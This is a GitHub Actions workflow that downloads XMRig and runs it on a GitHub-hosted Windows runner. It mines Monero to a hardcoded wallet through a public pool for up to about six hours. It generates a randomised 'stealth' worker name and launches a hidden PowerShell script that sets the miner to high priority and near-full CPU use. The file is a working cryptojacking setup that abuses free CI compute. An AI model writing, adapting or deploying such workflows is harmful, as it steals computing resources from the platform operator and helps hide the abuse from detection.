name: 🚀 High-Performance Windows XMRig Miner (Fixed)

on:
  workflow_dispatch:

jobs:
  ultra_mine:
    runs-on: windows-latest
    timeout-minutes: 355
    steps:
      - name: 🎲 Generate stealth worker name
        id: worker
        run: echo "name=win-$(Get-Random -Minimum 10000 -Maximum 99999)-$(Get-Date -Format 'HHmmss')" | Out-File -FilePath $env:GITHUB_OUTPUT -Append

      - name: ⚡ Download tuned XMRig
        run: |
          mkdir -p $env:USERPROFILE\miner
          cd $env:USERPROFILE\miner
          curl -sLo xmrig.zip https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-msvc-win64.zip
          tar -xf xmrig.zip
          ren xmrig-6.21.0 xmrig

      - name: 🛠️ Performance Tweaks (Fixed Syntax)
        run: |
          $cpuAffinityScript = @"
          `$pid = (Get-Process -Name xmrig).Id
          wmic process where ProcessId=`$pid CALL setpriority 'high priority'
          `$cores = (0..(Get-WmiObject Win32_Processor).NumberOfLogicalProcessors-1)
          `$affinity = [string]::Join(',', (`$cores | Select-Object -Skip 1))
          `$process = Get-Process -Id `$pid
          `$process.ProcessorAffinity = [convert]::ToInt32(`$affinity.Replace(',',''),2)
          "@
          Set-Content -Path affinity.ps1 -Value $cpuAffinityScript
          Start-Process powershell -ArgumentList "-File affinity.ps1" -WindowStyle Hidden

      - name: 💥 Run XMRig (Optimized)
        run: |
          cd $env:USERPROFILE\miner\xmrig
          $xmrigArgs = @(
            "-o pool.supportxmr.com:3333",
            "-u 85jUiJ7tUsZ1gCRTVy4RyoQwPypRBQf1CaZvhogatc1hYHeecdqcq4uUAWntQyUdRhZRB72n1Vt792JvPcstTcntR2g9eZS",
            "-p ${{ steps.worker.outputs.name }}",
            "--randomx-init=1",
            "--randomx-mode=fast",
            "--cpu-max-threads-hint=100",
            "--cpu-priority=5",
            "--argon2-impl=AVX2",
            "--asm=auto",
            "--donate-level=1",
            "--no-color"
          ) -join " "
          Start-Process -NoNewWindow -FilePath ".\xmrig.exe" -ArgumentList $xmrigArgs
